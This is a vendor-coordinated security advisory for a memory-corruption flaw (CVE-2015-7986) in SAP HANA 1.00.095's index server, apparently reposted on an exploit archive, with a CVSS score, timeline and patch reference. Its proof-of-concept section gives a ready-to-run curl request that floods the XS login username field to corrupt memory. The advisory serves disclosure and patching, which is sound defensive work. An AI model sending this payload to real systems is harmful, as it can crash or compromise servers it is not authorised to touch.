SAP HANA 1.00.095 - hdbindexserver Memory Corruption

SAP HANA hdbindexserver - Memory corruption
 
Application:                     SAP HANA
Versions Affected:          SAP HANA 1.00.095
Vendor URL:                  http://SAP.com
Bugs:                              Memory corruption, RCE
Reported:                       17.07.2015
Vendor response:          18.07.2015
Date of Public Advisory: 13.10.2015
Reference:                     SAP Security Note 2197428
Author:                            Mathieu Geli (ERPScan)
 
 
Description
 
 
1. ADVISORY INFORMATION
 
Title: SAP HANA 1.00.095
Advisory ID: [ERPSCAN-15-024]
Risk: Hight
Advisory URL: http://erpscan.com/advisories/erpscan-15-024-sap-hana-hdbindexserver-memory-corruption/
Date published: 13.10.2015
Vendors contacted: SAP
 
2. VULNERABILITY INFORMATION
 
Class: Memory corruption, RCE
Impact: full system compromise
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2015-7986
CVSS Information
CVSS Base Score:  9.3 / 10
CVSS Base Vector:
AV : Access Vector (Related exploit range)
     Network (N)
AC : Access Complexity (Required attack complexity)                 Medium (M)
Au : Authentication (Level of authentication needed to exploit)    None (N)
C : Impact to Confidentiality
                Complete (C)
I  : Impact to Integrity
                     Complete (C)
A : Impact to Availability
                   Complete (C)
 
3. VULNERABILITY DESCRIPTION
 
A buffer overflow vulnerability exists in SAP HANA interface. If an
attacker has a network access to the SQL interface or the SAP HANA
Extended Application Services interface of an SAP HANA system, the
vulnerability enables the attacker to inject code into the working
memory that is subsequently executed by the application. It can also
be used to cause a general fault in the product causing the product to
terminate.
 
Proof of concept
 
This authentication request should be replayed 10 times.
 
curl -v -XPOST http://hana:8000/sap/hana/xs/formLogin/login.xscfunc -H
'Content-type: application/x-www-form-urlencoded; charset=UTF-8' -H
'X-csrf-token: unsafe' -d
'xs-username=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
 
 
 
4. VULNERABLE PACKAGES
 
SAP HANA 1.00.095.00
Other versions are probably affected too, but they were not checked.
 
 
5. SOLUTIONS AND WORKAROUNDS
 
To correct this vulnerability, install SAP Security Note 2197428
 
 
6. AUTHOR
 
Mathieu Geli (ERPScan)
 
 
7. TECHNICAL DESCRIPTION
 
An anonymous attacker can use a special HTTP request to corrupt SAP
HANA index server memory.
 
 
8. REPORT TIMELINE
 
Send:  17.07.2015
Reported:  17.07.2015
Vendor response: 18.07.2015
Date of Public Advisory: 13.10.2015
 
 
9. REFERENCES
 
http://erpscan.com/advisories/erpscan-15-024-sap-hana-hdbindexserver-memory-corruption/

#  0day.today [2018-02-06]  #